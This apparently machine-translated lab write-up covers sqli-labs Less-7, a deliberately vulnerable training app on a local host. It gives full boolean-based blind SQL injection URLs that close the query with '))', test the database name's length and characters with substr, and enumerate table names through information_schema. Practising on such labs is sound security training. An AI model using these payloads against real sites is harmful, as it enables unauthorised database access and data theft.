After opening the first page, find the page display outfile, I'm sorry, can not read, directly add 'discover the error
Later, he learned to view the source code is two bracketed
We can construct our payload, and
First inquiry length of the current database, and found that 8 or more correct than or equal to 9 errors, we can see that the database length is 8,
http://192.168.48.130/sqli-labs-master/Less-7/?id=1')) and length(database())>=8--+
When we determine the database name of the library to use the functions:
substr (database, 1,1) means that the value taken database, each return only one value from a beginning.
Judging by character database library name:
http://192.168.48.130/sqli-labs-master/Less-7/?id=1')) and substr(database(),1,1)='s'--+ s
http://192.168.48.130/sqli-labs-master/Less-7/?id=1')) and substr(database(),2,1)='e'--+ e
Here I would not continue writing, and have done so much in front of the title name is also known database security
Lookup Table Name: This way, we've always known that the users table in the first four tables,
所以构造payload:http://192.168.48.130/sqli-labs-master/Less-7/?id=1')) and substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)='u'--+
Insert field contents will not much later repeat